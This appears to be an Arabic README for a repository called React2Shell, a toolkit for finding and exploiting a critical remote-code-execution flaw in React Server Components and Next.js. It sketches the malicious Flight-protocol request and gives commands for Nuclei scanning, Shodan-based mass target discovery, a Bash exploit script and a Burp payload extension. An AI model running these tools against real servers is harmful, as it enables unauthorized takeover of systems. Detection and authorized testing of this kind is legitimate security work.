
🔥 مجموعة أدوات React2Shell - CVE-2025-55182 و CVE-2025-66478
🚨 ثغرة RCE حرجة في مكونات React الخادمة و Next.js 🚨
حزمة أدوات الفريق الأحمر الاحترافية لكشف واستغلال CVE-2025-55182
React2Shell هو ثغرة حرجة غير مصادقة لتنفيذ الأوامر عن بُعد (RCE) تؤثر على مكونات React الخادمة (RSC) وتطبيقات Next.js.
| CVE ID | المكون | درجة CVSS | التأثير |
|---|---|---|---|
| CVE-2025-55182 | مكونات React الخادمة | 10.0 🔴 | سيطرة كاملة على الخادم |
| CVE-2025-66478 | إجراءات Next.js الخادمة | 10.0 🔴 | اختراق كامل للنظام |
// المهاجم يرسل حمولة ضارة لبروتوكول Flight
POST / HTTP/1.1
Next-Action: exploit
Content-Type: multipart/form-data
{"__proto__": "pollution", "then": "gadget_chain"}
↓
إلغاء تسلسل غير آمن
↓
تلويث النموذج الأولي
↓
💥 تنفيذ الأوامر عن بُعد 💥
|
🔓 استغلال RCE ناجح
تنفيذ الأوامر عبر ثغرة React2Shell |
💥 تأكيد الثغرة
اختراق الخادم عبر بروتوكول Flight |
⚠️ هذه اللقطات توضح استغلالاً حقيقياً في بيئات خاضعة للرقابة
استخدم بمسؤولية وفقط بإذن مناسب
يحتوي هذا المستودع على 4 أدوات احترافية لكشف واستغلال CVE-2025-55182:
🔍 قالب Nucleiماسح متقدم ✅ 5 حمولات |
🐍 ماسح Shodanاكتشاف الأهداف ✅ بحث آلي |
💻 استغلال Bashإطار عمل CLI ✅ 8 حمولات محددة مسبقاً |
🔧 إضافة Burpاختبار يدوي ✅ أكثر من 30 حمولة |
# استنساخ المستودع
git clone https://github.com/cybertechajju/R2C-CVE-2025-55182-66478.git
cd R2C-CVE-2025-55182-66478
# تثبيت متطلبات Python
pip install -r requirements.txt
pip install -r exploits/requirements.txt
# مسح هدف واحد
nuclei -t nuclei-templates/cve-2025-55182.yaml -u https://target.com
# مسح أهداف متعددة
nuclei -t nuclei-templates/cve-2025-55182.yaml -l targets.txt
# وضع المعالج التفاعلي
python exploits/shodan_scanner_advanced.py
# أو باستخدام مفتاح API مباشرة
python exploits/shodan_scanner_advanced.py --api YOUR_SHODAN_API_KEY
# الوضع التفاعلي
bash exploits/scanner_advanced.sh -i
# استغلال سريع
bash exploits/scanner_advanced.sh -d https://target.com -p 2
burp-extension/React2Shell_Burp.pycve-2025-55182/
├── 📂 nuclei-templates/ # قوالب Nuclei بصيغة YAML
│ └── cve-2025-55182.yaml # قالب كشف متقدم
├── 📂 exploits/ # أدوات الاستغلال
│ ├── shodan_scanner_advanced.py # ماسح Shodan الجماعي
│ ├── scanner_advanced.sh # إطار عمل Bash للاستغلال
│ └── requirements.txt # متطلبات Python
├── 📂 burp-extension/ # إضافة Burp Suite
│ ├── React2Shell_Burp.py # الإضافة الرئيسية (أكثر من 30 حمولة)
│ ├── payloads.json # مكتبة الحمولات
│ └── detection_rules.json # أنماط الكشف
├── 📂 burp bechek/ # ملفات BCheck لماسح Burp
│ ├── CVE-2025-55182-React2Shell-Active.bcheck
│ └── CVE-2025-66478-NextJS-React2Shell-Active.bcheck
└── 📄 README.md # هذا الملف
41 * 271 = 11111 (صفر نتائج إيجابية خاطئة)